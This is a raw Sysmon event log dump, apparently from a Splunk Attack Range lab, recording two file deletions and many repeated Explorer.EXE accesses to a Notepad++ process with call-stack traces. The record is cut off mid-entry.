23542300x8000000000000000806921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:30.067{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7BEFDD221976BC965723D29A6DD63659,SHA256=2083DBC8D42935B5E5049AC624CF6AE8C5E03B168F008074DC0FF0769E0BA860,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:31.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45230BB7864DB6644D0E4DCF4295DB32,SHA256=E0A983FDE9A783F25B58F0DAE0FE6C5787E73E3F8033A8B178D6AE63B774A6B3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.938{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.937{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.937{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.936{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.935{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.935{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.935{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.934{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.934{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.934{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.934{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.933{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.933{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.933{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 